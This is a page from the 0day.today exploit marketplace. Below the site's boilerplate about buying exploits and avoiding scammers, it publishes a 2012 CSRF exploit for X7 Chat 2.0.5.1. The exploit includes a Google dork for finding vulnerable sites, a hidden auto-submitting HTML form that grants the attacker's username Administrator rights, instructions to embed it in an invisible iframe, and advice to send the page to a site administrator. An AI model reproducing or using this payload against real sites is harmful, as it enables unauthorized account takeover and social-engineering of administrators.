0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
X7 Chat 2.0.5.1 CSRF Add Admin Exploit
# Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit # Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5" # Date: 09.05.2012 # Author: DennSpec # Software Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip # Version: <= 2.0.5.1 firstly, register and give a username. (frame.html in path of your main html page) <html> <body onload="document.xform.submit();"> <form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post"> <input type="hidden" name="username" value="YOURUSERNAME" /> <input type="hidden" name="usergroup" value="Administrator" /> </form> </body> </html> Replace http://xxxxxxxxx.com/x7path/ to your target url. Dont forget replace YOURUSERNAME to YOURUSERNAME. add this code to inside body tag of main html page: <iframe style="display:none;" src="frame.html"></iframe> and... upload main page and frame.html . Send main page url to any administrator. # 0day.today [2024-11-15] #